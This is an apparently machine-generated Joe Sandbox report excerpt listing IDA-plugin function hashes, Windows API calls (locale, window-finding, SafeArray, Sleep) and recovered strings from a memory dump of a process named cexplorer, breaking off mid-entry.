                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: bf9eddbab0c2fef7672b8472f2d2fd637454bb0f8b1daf1517a1e2d8766482e9
                                                                                                            • Instruction ID: 2d022383effea14c5e1ba0f9b254559a7c2173088f540ba740ca01ab1c05e9b3
                                                                                                            • Opcode Fuzzy Hash: bf9eddbab0c2fef7672b8472f2d2fd637454bb0f8b1daf1517a1e2d8766482e9
                                                                                                            • Instruction Fuzzy Hash: 3AE0D87570031417D310E958AC95AF6727DB78D600F4041BBBD09DB352EDA0ED4046E4
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 035E737F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: 00ea3530eb76a56b5878df0d2f93cd9045d140bdb75e66650f77ae501a3fbdc1
                                                                                                            • Instruction ID: 8ef6f9df6de6cd2769d754916a2d34b7974e70e8ef875d5e635e920fd55f7980
                                                                                                            • Opcode Fuzzy Hash: 00ea3530eb76a56b5878df0d2f93cd9045d140bdb75e66650f77ae501a3fbdc1
                                                                                                            • Instruction Fuzzy Hash: 6FF0E574C0430CCFCFA4EA64ED025E8B7B8B74D314F0006D6C954D2264E630078ADBA2
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0356AA4A,?,00000001,00000000,0356AC59), ref: 0356A95B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: c119fb1773f73cd282a7f1f20534bdb2899b2ac937c059aa3e62d75af140a6f5
                                                                                                            • Instruction ID: 7d59c4f0221a43453f25fb7c6c983c80db917d1b7b0851014908385388029646
                                                                                                            • Opcode Fuzzy Hash: c119fb1773f73cd282a7f1f20534bdb2899b2ac937c059aa3e62d75af140a6f5
                                                                                                            • Instruction Fuzzy Hash: 4DD05EA630932026E210915B7D44D7766ECDFC5BA1F154436BA88DB111D210CC458270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93129b054b965bd74cf9fdec08082a9cbe0b53470be4beaa0daf4c7ad3108a03
                                                                                                            • Instruction ID: a4f9bc67704c954a19e489fba26a8d109a582f56c9e1a09fc043cefd8c699452
                                                                                                            • Opcode Fuzzy Hash: 93129b054b965bd74cf9fdec08082a9cbe0b53470be4beaa0daf4c7ad3108a03
                                                                                                            • Instruction Fuzzy Hash: CC02D032900635CFDB92CF6DC484109B7B6FF8A72432A82D5D858AB629D270BE51DFD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                            • Instruction ID: 19591b50ac9f78c43ddcaa5f9134b0ebc2a24eacea51600c71fdede77b761931
                                                                                                            • Opcode Fuzzy Hash: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                            • Instruction Fuzzy Hash: 88D012AA26214296F72BC06E78F0B638547F741364F29CC2BBC03D6EE0E565EC9081A0
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0356EFB1
                                                                                                              • Part of subcall function 0356EF7C: GetProcAddress.KERNEL32(00000000), ref: 0356EF95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                            • Opcode ID: 4368d0d85f20e5eb244e5d2a3552cec86ca7a04c84a7a898b577580e90640e5d
                                                                                                            • Instruction ID: c4f31df06f30d00c92238c1ebc663fde0bd12b06660729db3a9b2be153eeab7e
                                                                                                            • Opcode Fuzzy Hash: 4368d0d85f20e5eb244e5d2a3552cec86ca7a04c84a7a898b577580e90640e5d
                                                                                                            • Instruction Fuzzy Hash: 4E41BB6DB1A30D5F5604EB6DBA02827B7E9F68D650360411AF405CF778DF30BC469A29
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E735C: GetVersionExW.KERNEL32(?), ref: 035E737F
                                                                                                            • FindWindowExW.USER32(?,00000000,DUIViewWndClassName,00000000), ref: 035E78AF
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 035E78BE
                                                                                                            • FindWindowExW.USER32(?,00000000,ShellDll_DefView,00000000), ref: 035E78E0
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 035E78F8
                                                                                                            • FindWindowExW.USER32(?,00000000,ComboBoxEx32,00000000), ref: 035E7915
                                                                                                            • FindWindowExW.USER32(?,00000000,ComboBox,00000000), ref: 035E793A
                                                                                                            • FindWindowExW.USER32(?,00000000,Edit,00000000), ref: 035E7950
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Find$Long$Version
                                                                                                            • String ID: #32770$ComboBox$ComboBoxEx32$DUIViewWndClassName$Edit$ShellDll_DefView
                                                                                                            • API String ID: 1586926634-2731451753
                                                                                                            • Opcode ID: 44cdc4ccd8fb5b2352253b519e847c812fee90d08408f59e282ea4311de2a19a
                                                                                                            • Instruction ID: 1668659371e5b5964dc5b6ba7f9ecc200277436cc603ec5604cd0d3bfa7ecdce
                                                                                                            • Opcode Fuzzy Hash: 44cdc4ccd8fb5b2352253b519e847c812fee90d08408f59e282ea4311de2a19a
                                                                                                            • Instruction Fuzzy Hash: F0314134B4434AAADF14E7A8BC55F9EBBB8BF4D700F1404D1BA50EB5E1D670A600C764
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0356AC59,?,?,?,?,00000000,00000000), ref: 0356A99B
                                                                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0356AC59,?,?,?,?,00000000,00000000), ref: 0356A9A4
                                                                                                              • Part of subcall function 0356A948: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0356AA4A,?,00000001,00000000,0356AC59), ref: 0356A95B
                                                                                                              • Part of subcall function 0356A8FC: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Locale$Info$ThreadValid
                                                                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                            • API String ID: 233154393-3379564615
                                                                                                            • Opcode ID: 291a53f4f966d9f15809cfb96e38dfd936485c98b41e648614ced983fbf06155
                                                                                                            • Instruction ID: 7041f970a0de3cbb71de477bf54e3c83d2c1c08c2169024cbd48699d2d7502ca
                                                                                                            • Opcode Fuzzy Hash: 291a53f4f966d9f15809cfb96e38dfd936485c98b41e648614ced983fbf06155
                                                                                                            • Instruction Fuzzy Hash: 767155B470024A9BDB01EB68E850A9E77BAFFC8340F518065E904BF376DB35DE068755
                                                                                                            APIs
                                                                                                              • Part of subcall function 035560C0: GetTickCount.KERNEL32 ref: 035560F7
                                                                                                              • Part of subcall function 035560C0: GetTickCount.KERNEL32 ref: 0355610F
                                                                                                              • Part of subcall function 0356A8FC: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0356B140
                                                                                                            • EnumCalendarInfoW.KERNEL32(0356AF6C,00000000,00000000,00000004), ref: 0356B14B
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B186
                                                                                                            • EnumCalendarInfoW.KERNEL32(0356B010,00000000,00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B191
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0356B222
                                                                                                            • EnumCalendarInfoW.KERNEL32(0356AF6C,00000000,00000000,00000004), ref: 0356B22D
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B26A
                                                                                                            • EnumCalendarInfoW.KERNEL32(0356B010,00000000,00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B275
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale$CalendarEnumThread$CountTick
                                                                                                            • String ID: B.C.
                                                                                                            • API String ID: 1601775584-621294921
                                                                                                            • Opcode ID: 92825c1a42059d10adee7b42bf9a1b634658ea581fbf1187c1b2e82ae19f5c3f
                                                                                                            • Instruction ID: dd7288a276b00097b361e3d4d456c597b5b467c6f0017678365d22f9650a00fd
                                                                                                            • Opcode Fuzzy Hash: 92825c1a42059d10adee7b42bf9a1b634658ea581fbf1187c1b2e82ae19f5c3f
                                                                                                            • Instruction Fuzzy Hash: 5B61ADB8A003069FD710EF69E890E6E77B5FF88310B114266E911EB375E730E946DB90
                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000,00000000), ref: 03559E12
                                                                                                            • LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000), ref: 03559E36
                                                                                                            • LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000), ref: 03559E45
                                                                                                            • IsValidLocale.KERNEL32(00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559E57
                                                                                                            • EnterCriticalSection.KERNEL32(035F6B8C,00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559EB4
                                                                                                            • LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559EDD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                            • API String ID: 975949045-3021119265
                                                                                                            • Opcode ID: 6661b9bb33378dbbdbb3f442e5849289dcf8917f45a699f938c2bfd19b0be36d
                                                                                                            • Instruction ID: c5fa827dd2e9f79b8a9ee9e5fcf9aabf8a71676539d794b6fb7c27e22622c078
                                                                                                            • Opcode Fuzzy Hash: 6661b9bb33378dbbdbb3f442e5849289dcf8917f45a699f938c2bfd19b0be36d
                                                                                                            • Instruction Fuzzy Hash: F0219D2C3407429FDB10F7B8B831A1E62B5BFC9B40B944427BD44CF271DB69BD018262
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 035E75B3
                                                                                                            • GetParent.USER32(00000000), ref: 035E75B9
                                                                                                            • GetClassNameW.USER32(?,?,0000002A), ref: 035E75D5
                                                                                                            • GetForegroundWindow.USER32(?,?,0000002A,00000000,00000000,035E7688), ref: 035E7602
                                                                                                            • GetClassNameW.USER32(?,?,0000002A), ref: 035E761A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassNameParent$ForegroundWindow
                                                                                                            • String ID: Progman$WorkerA$WorkerW
                                                                                                            • API String ID: 2969989632-172977758
                                                                                                            • Opcode ID: bc828ab376a82044c8616c49b68498ff01834bcd8972e51dac2d814bf57dfce5
                                                                                                            • Instruction ID: fb81a3a6afcce880bc2cad6db2650a48d4e4b553a164068b6e6bdd0137c9ce5b
                                                                                                            • Opcode Fuzzy Hash: bc828ab376a82044c8616c49b68498ff01834bcd8972e51dac2d814bf57dfce5
                                                                                                            • Instruction Fuzzy Hash: 01315174E0430E9FCF04EBE8E955A9DBBF5BF8C308F504496A804A7270E730AA418B95
                                                                                                            APIs
                                                                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0355B34C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3997070919-0
                                                                                                            • Opcode ID: caa7075bec9111f3ab53f2e7a2690d8c0dcebeab829bd882439c2f69c70af4e8
                                                                                                            • Instruction ID: ae448d75a3318a29ff4181ed7a23a29ed63851a405a7ebb24a9408d6172ddbf0
                                                                                                            • Opcode Fuzzy Hash: caa7075bec9111f3ab53f2e7a2690d8c0dcebeab829bd882439c2f69c70af4e8
                                                                                                            • Instruction Fuzzy Hash: 4FA14075900309DFDB24DFA8E8D8BAEB7B5FB48310F14811AF915AB2A4DB70B945CB50
                                                                                                            APIs
                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 035710FD
                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03571119
                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 03571152
                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 035711CF
                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 035711E8
                                                                                                            • VariantCopy.OLEAUT32(?), ref: 0357121D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 351091851-3916222277
                                                                                                            • Opcode ID: 808b75b1382cb8382c760c7c9109327d151ab10801d19e8297b759494dcee33f
                                                                                                            • Instruction ID: bd3a53fec037b79385175a81be811ccbf857e20feb5216560716a71198ad55a7
                                                                                                            • Opcode Fuzzy Hash: 808b75b1382cb8382c760c7c9109327d151ab10801d19e8297b759494dcee33f
                                                                                                            • Instruction Fuzzy Hash: 63510A7990162A9BCB26DB58ED80BD9B3FCBF48200F0441D5E509EB261D670AF858F61
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,03553AC8), ref: 03553EEE
                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03553AC8), ref: 03553F08
                                                                                                            Memory Dump Source
